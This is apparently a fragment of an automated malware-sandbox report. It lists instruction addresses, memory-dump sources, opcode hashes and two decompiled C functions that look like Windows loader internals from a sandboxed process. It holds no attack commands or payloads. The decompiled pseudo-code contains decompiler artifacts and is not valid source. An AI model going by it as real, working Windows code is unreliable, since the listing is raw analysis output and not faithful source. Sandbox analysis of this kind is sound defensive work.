                                                                          0x01188701
                                                                          0x01188706
                                                                          0x01188709
                                                                          0x0118870b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01188711
                                                                          0x01188725
                                                                          0x01188727
                                                                          0x0118872a
                                                                          0x0118872c
                                                                          0x011d9af0
                                                                          0x011d9af5
                                                                          0x01188732
                                                                          0x01188732
                                                                          0x01188732
                                                                          0x01188735
                                                                          0x01188737
                                                                          0x01188515
                                                                          0x01188515
                                                                          0x01188518
                                                                          0x0118851d
                                                                          0x01188523
                                                                          0x01188527
                                                                          0x0118852b
                                                                          0x01188537
                                                                          0x01188539
                                                                          0x0118853c
                                                                          0x0118853e
                                                                          0x0118868c
                                                                          0x01188691
                                                                          0x01188699
                                                                          0x0118869b
                                                                          0x01188744
                                                                          0x01188748
                                                                          0x011886a1
                                                                          0x011886a1
                                                                          0x011886a1
                                                                          0x011886a4
                                                                          0x011886a8
                                                                          0x011d9bdf
                                                                          0x011d9bdf
                                                                          0x011886ae
                                                                          0x011886b0
                                                                          0x00000000
                                                                          0x011886b6
                                                                          0x00000000
                                                                          0x011d9be9
                                                                          0x011886b0
                                                                          0x01188544
                                                                          0x0118854a
                                                                          0x0118854d
                                                                          0x01188551
                                                                          0x0118876e
                                                                          0x01188778
                                                                          0x0118877b
                                                                          0x01188780
                                                                          0x01188557
                                                                          0x01188557
                                                                          0x0118855d
                                                                          0x0118855d
                                                                          0x0118856b
                                                                          0x0118856e
                                                                          0x01188570
                                                                          0x01188573
                                                                          0x01188576
                                                                          0x01188576
                                                                          0x01188579
                                                                          0x0118857b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01188581
                                                                          0x011885a0
                                                                          0x011885a2
                                                                          0x011885a5
                                                                          0x011885a7
                                                                          0x011d9b1b
                                                                          0x011d9b1b
                                                                          0x0118862e
                                                                          0x0118862e
                                                                          0x01188631
                                                                          0x01188631
                                                                          0x01188634
                                                                          0x01188636
                                                                          0x01188669
                                                                          0x01188669
                                                                          0x0118866b
                                                                          0x011d9bbf
                                                                          0x011d9bc4
                                                                          0x011d9bc8
                                                                          0x011d9bce
                                                                          0x011d9bce
                                                                          0x01188671
                                                                          0x01188671
                                                                          0x01188674
                                                                          0x01188676
                                                                          0x011d9bae
                                                                          0x011d9bae
                                                                          0x01188676
                                                                          0x0118867c
                                                                          0x0118867e
                                                                          0x01188688
                                                                          0x01188688
                                                                          0x00000000
                                                                          0x0118867e
                                                                          0x01188638
                                                                          0x01188638
                                                                          0x0118863b
                                                                          0x0118863e
                                                                          0x0118863f
                                                                          0x01188642
                                                                          0x01188645
                                                                          0x01188648
                                                                          0x0118864d
                                                                          0x011d9b69
                                                                          0x011d9b6e
                                                                          0x011d9b7b
                                                                          0x011d9b81
                                                                          0x011d9b85
                                                                          0x011d9b89
                                                                          0x011d9ba7
                                                                          0x011d9b8b
                                                                          0x011d9b91
                                                                          0x011d9b9a
                                                                          0x011d9b9f
                                                                          0x011d9b9f
                                                                          0x01188788
                                                                          0x0118878d
                                                                          0x01188763
                                                                          0x01188763
                                                                          0x01188766
                                                                          0x00000000
                                                                          0x01188766
                                                                          0x011d9b70
                                                                          0x00000000
                                                                          0x011d9b70
                                                                          0x01188656
                                                                          0x0118865a
                                                                          0x0118865c
                                                                          0x01188752
                                                                          0x01188756
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118875e
                                                                          0x00000000
                                                                          0x0118875e
                                                                          0x01188662
                                                                          0x01188662
                                                                          0x01188662
                                                                          0x01188666
                                                                          0x00000000
                                                                          0x01188666
                                                                          0x011885b7
                                                                          0x011885b9
                                                                          0x011885bc
                                                                          0x011885bf
                                                                          0x011885cc
                                                                          0x011885d1
                                                                          0x011885d4
                                                                          0x011885db
                                                                          0x011885de
                                                                          0x011885e0
                                                                          0x011d9b5f
                                                                          0x00000000
                                                                          0x011d9b5f
                                                                          0x011885e6
                                                                          0x011885ea
                                                                          0x011886c3
                                                                          0x011886c5
                                                                          0x011886c8
                                                                          0x011886ca
                                                                          0x011d9b16
                                                                          0x00000000
                                                                          0x011d9b16
                                                                          0x011886d6
                                                                          0x011885f6
                                                                          0x011885f6
                                                                          0x011885f9
                                                                          0x01188602
                                                                          0x01188606
                                                                          0x0118860a
                                                                          0x0118860b
                                                                          0x0118860e
                                                                          0x01188611
                                                                          0x00000000
                                                                          0x01188611
                                                                          0x011885f3
                                                                          0x00000000
                                                                          0x011885f3
                                                                          0x01188619
                                                                          0x0118861e
                                                                          0x0118861e
                                                                          0x01188621
                                                                          0x01188622
                                                                          0x01188623
                                                                          0x01188625
                                                                          0x0118862c
                                                                          0x00000000
                                                                          0x0118873d
                                                                          0x00000000
                                                                          0x0118873d
                                                                          0x01188737
                                                                          0x0118850f
                                                                          0x01188512
                                                                          0x00000000
                                                                          0x01188512
                                                                          0x00000000
                                                                          0x011884d6

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3de5aaa6b3191d021b0714f99b8da1a8fca733bb87375bde75747b8d45bd6bb2
                                                                          • Instruction ID: 5cea3a12caf61fc76c5bd59ceb40439a876974535ded339a3c501906d31b572e
                                                                          • Opcode Fuzzy Hash: 3de5aaa6b3191d021b0714f99b8da1a8fca733bb87375bde75747b8d45bd6bb2
                                                                          • Instruction Fuzzy Hash: 7FB18D71E0020ADFDB2DEF99D984AADBBB5FF48308F508129E505AB385D770A841CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A513A, Relevance: .3, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E011A513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x126d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E011BD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01192280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01194620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E011BF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0118FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x126b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E011BB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                          0x011a5142
                                                                          0x011a514c
                                                                          0x011a5150
                                                                          0x011a5157
                                                                          0x011a5159
                                                                          0x011a515e
                                                                          0x011a5165
                                                                          0x011a5169
                                                                          0x011a516c
                                                                          0x011a5172
                                                                          0x011a5176
                                                                          0x011a517a
                                                                          0x011a517a
                                                                          0x011a517a
                                                                          0x011a517f
                                                                          0x011e6d8b
                                                                          0x011e6d8e
                                                                          0x011e6d91
                                                                          0x011e6d95
                                                                          0x011e6d98
                                                                          0x011e6d9c
                                                                          0x011e6da0
                                                                          0x011e6da3
                                                                          0x011e6da7
                                                                          0x011e6e26
                                                                          0x011e6e26
                                                                          0x011e6e2a
                                                                          0x011a51f9
                                                                          0x011a51f9
                                                                          0x011a51fe
                                                                          0x011e6e33
                                                                          0x011e6e33
                                                                          0x011e6e39
                                                                          0x011e6e3d
                                                                          0x011e6e46
                                                                          0x011e6e50
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6e52
                                                                          0x011e6e53
                                                                          0x011e6e56
                                                                          0x011e6e5d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6e5f
                                                                          0x011e6e67
                                                                          0x011e6e77
                                                                          0x011e6e7f
                                                                          0x011e6e80
                                                                          0x011e6e88
                                                                          0x011e6e90
                                                                          0x011e6e9f
                                                                          0x011e6ea5
                                                                          0x011e6ea9
                                                                          0x011e6eb1
                                                                          0x011e6ebf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6ecf
                                                                          0x011e6ed3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6edb
                                                                          0x011e6ede
                                                                          0x011e6ee1
                                                                          0x011e6ee8
                                                                          0x011e6eeb
                                                                          0x011e6eed
                                                                          0x011e6ef0
                                                                          0x011e6ef4
                                                                          0x011e6ef8
                                                                          0x011e6efc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6f0d
                                                                          0x011e6f11
                                                                          0x011e6f32
                                                                          0x011e6f37
                                                                          0x011e6f3b
                                                                          0x011e6f3e
                                                                          0x011e6f41
                                                                          0x011e6f46
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e6f4c
                                                                          0x011e6f50
                                                                          0x011e6f50
                                                                          0x011e6f54
                                                                          0x011e6f62
                                                                          0x011e6f65
                                                                          0x011e6f6d
                                                                          0x011e6f7b
                                                                          0x011e6f7b
                                                                          0x011e6f93
                                                                          0x011e6f98
                                                                          0x011e6fa0
                                                                          0x011e6fa6
                                                                          0x011e6fb3
                                                                          0x011e6fb6
                                                                          0x011e6fbf
                                                                          0x011e6fc1
                                                                          0x011e6fd5
                                                                          0x011e6fda
                                                                          0x011e6fda
                                                                          0x011e6fdd
                                                                          0x011e6fe2
                                                                          0x011e6fe7
                                                                          0x011e6feb
                                                                          0x011e6fef
                                                                          0x011e6ff3
                                                                          0x011a520c
                                                                          0x011a520c
                                                                          0x011a520f
                                                                          0x011a5215
                                                                          0x011a5234
                                                                          0x011a523a
                                                                          0x011a523a
                                                                          0x011a5244
                                                                          0x011a5245
                                                                          0x011a5246
                                                                          0x011a5251
                                                                          0x011a5251
                                                                          0x011e6f13
                                                                          0x011e6f17
                                                                          0x011e6f17
                                                                          0x011e6f18
                                                                          0x011e6f1b
                                                                          0x011e6f1f
                                                                          0x011e6f23
                                                                          0x00000000
                                                                          0x011e6f28
                                                                          0x011a5204
                                                                          0x011a5204
                                                                          0x011a5208
                                                                          0x00000000
                                                                          0x011a5208
                                                                          0x011a5185
                                                                          0x011a5188
                                                                          0x011a518a
                                                                          0x011a518e
                                                                          0x011a5195
                                                                          0x011e6db1
                                                                          0x011e6db5
                                                                          0x011e6db9
                                                                          0x011a519b
                                                                          0x011a519b
                                                                          0x011a519e
                                                                          0x011a51a7
                                                                          0x011a51a9
                                                                          0x011a51a9
                                                                          0x011a51b5
                                                                          0x011a51b8
                                                                          0x011a51bb
                                                                          0x011a51be
                                                                          0x011a51c1
                                                                          0x011a51c5
                                                                          0x011a51c9
                                                                          0x011a51cd
                                                                          0x011a51cd
                                                                          0x011a51d8
                                                                          0x011a51dc
                                                                          0x011a51e0
                                                                          0x011e6dcc
                                                                          0x011e6dd0
                                                                          0x011e6dd5
                                                                          0x011e6ddd
                                                                          0x011e6de1
                                                                          0x011e6de1
                                                                          0x011e6de5
                                                                          0x011e6deb
                                                                          0x011e6df1
                                                                          0x011e6df7
                                                                          0x011e6dfd
                                                                          0x011e6e01
                                                                          0x011e6e05
                                                                          0x011e6e09
                                                                          0x011e6e0d
                                                                          0x011e6e11
                                                                          0x011e6e11
                                                                          0x011a51eb
                                                                          0x011e6e1a
                                                                          0x011e6e1f
                                                                          0x011e6e21
                                                                          0x011e6e23
                                                                          0x00000000
                                                                          0x011a51f1
                                                                          0x011a51f1
                                                                          0x00000000
                                                                          0x011a51f1

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90e7db12b125d8e0def136d48c1c0491200bb7f99dd30907dadbfba411b8d269
                                                                          • Instruction ID: 989e45415d0079709a6c7dd09ee57d1789be6ed5e7671cdffdd087052c77ef89
                                                                          • Opcode Fuzzy Hash: 90e7db12b125d8e0def136d48c1c0491200bb7f99dd30907dadbfba411b8d269
                                                                          • Instruction Fuzzy Hash: 62C122755087818FD358CF68C480A6AFBF1BF88314F54496EF9998B392D771E845CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A03E2, Relevance: .3, Instructions: 254COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E011A03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x126d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E011A0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E011BB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0118B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1267c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01197D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01197D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E011F7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E011B9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E011F69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1267c04 != 0) {
						_t118 = _v12;
						_t120 = E011FA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1267bd8;
						if( *0x1267bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E011B95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E011B99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E011F3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0117B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E011BAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1268474 - 3;
										if( *0x1268474 != 3) {
											 *0x12679dc =  *0x12679dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01197D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01197D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E011F7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1268708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1267b00; // 0x0
							asm("ror esi, cl");
							 *0x126b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E011B95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01187F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                          0x011a03f1
                                                                          0x011a03f7
                                                                          0x011a03f9
                                                                          0x011a03fb
                                                                          0x011a03fd
                                                                          0x011a0400
                                                                          0x011a040a
                                                                          0x011e4c7a
                                                                          0x011a0537
                                                                          0x011a0547
                                                                          0x011a0410
                                                                          0x011a0410
                                                                          0x011a0414
                                                                          0x011a0417
                                                                          0x011a041a
                                                                          0x011a0421
                                                                          0x011a0424
                                                                          0x011a042b
                                                                          0x011a043b
                                                                          0x011a043e
                                                                          0x011a043f
                                                                          0x011a043f
                                                                          0x011a0446
                                                                          0x011a0449
                                                                          0x011a044c
                                                                          0x011a044f
                                                                          0x011a0459
                                                                          0x011e4c8d
                                                                          0x011a045f
                                                                          0x011a045f
                                                                          0x011a045f
                                                                          0x011a0467
                                                                          0x011e4c97
                                                                          0x011e4c9d
                                                                          0x011e4ca4
                                                                          0x011e4caa
                                                                          0x011e4caf
                                                                          0x011e4cb1
                                                                          0x011e4cc3
                                                                          0x011e4cb3
                                                                          0x011e4cbc
                                                                          0x011e4cbc
                                                                          0x011e4cc8
                                                                          0x011e4ccb
                                                                          0x011e4cd7
                                                                          0x011e4cda
                                                                          0x011e4cdf
                                                                          0x011e4cdf
                                                                          0x011e4ccb
                                                                          0x011e4ca4
                                                                          0x011a046d
                                                                          0x011a046f
                                                                          0x011a046f
                                                                          0x011a0471
                                                                          0x011a0476
                                                                          0x011a047a
                                                                          0x011a047b
                                                                          0x011a0483
                                                                          0x011a0489
                                                                          0x011a048d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4ce9
                                                                          0x011e4cef
                                                                          0x011e4d22
                                                                          0x011e4d22
                                                                          0x00000000
                                                                          0x011e4d22
                                                                          0x011e4cf1
                                                                          0x011e4cf7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4cf9
                                                                          0x011e4cff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d05
                                                                          0x011e4d07
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d0d
                                                                          0x011e4d0f
                                                                          0x011e4d14
                                                                          0x011e4d16
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d1c
                                                                          0x011e4d1c
                                                                          0x011a0499
                                                                          0x011a0535
                                                                          0x011a0535
                                                                          0x00000000
                                                                          0x011a0535
                                                                          0x011a04a6
                                                                          0x011e4d2c
                                                                          0x011e4d37
                                                                          0x011e4d39
                                                                          0x011e4d3b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d41
                                                                          0x011e4d48
                                                                          0x011a0527
                                                                          0x011a052b
                                                                          0x011a052d
                                                                          0x011a0530
                                                                          0x011a0530
                                                                          0x00000000
                                                                          0x011a052b
                                                                          0x011e4d4e
                                                                          0x011a04ac
                                                                          0x011a04ac
                                                                          0x011a04af
                                                                          0x011a04b2
                                                                          0x011a04b7
                                                                          0x011a04b9
                                                                          0x011a04bb
                                                                          0x011a04bd
                                                                          0x011a04bf
                                                                          0x011a04c5
                                                                          0x011a04c9
                                                                          0x011e4d53
                                                                          0x011e4d59
                                                                          0x011e4db9
                                                                          0x011e4dba
                                                                          0x011e4dbf
                                                                          0x011e4dc2
                                                                          0x011e4dc4
                                                                          0x011e4dc7
                                                                          0x011e4dce
                                                                          0x00000000
                                                                          0x011e4dce
                                                                          0x011e4d5b
                                                                          0x011e4d61
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d63
                                                                          0x011e4d69
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4d6b
                                                                          0x011e4d6e
                                                                          0x011e4d74
                                                                          0x011e4d76
                                                                          0x011e4d7c
                                                                          0x011e4d7e
                                                                          0x011e4d84
                                                                          0x011e4d89
                                                                          0x011e4d8c
                                                                          0x011e4d8d
                                                                          0x011e4d92
                                                                          0x011e4d95
                                                                          0x011e4d96
                                                                          0x011e4d98
                                                                          0x011e4d9a
                                                                          0x011e4d9f
                                                                          0x011e4da4
                                                                          0x011e4da6
                                                                          0x011e4da8
                                                                          0x011e4daf
                                                                          0x011e4db1
                                                                          0x011e4db1
                                                                          0x011e4daf
                                                                          0x011e4da6
                                                                          0x011e4d84
                                                                          0x011e4d7c
                                                                          0x00000000
                                                                          0x011e4d74
                                                                          0x011a04d6
                                                                          0x011e4de1
                                                                          0x011a04dc
                                                                          0x011a04dc
                                                                          0x011a04dc
                                                                          0x011a04e4
                                                                          0x011e4deb
                                                                          0x011e4df1
                                                                          0x011e4df8
                                                                          0x011e4dfe
                                                                          0x011e4e03
                                                                          0x011e4e05
                                                                          0x011e4e17
                                                                          0x011e4e07
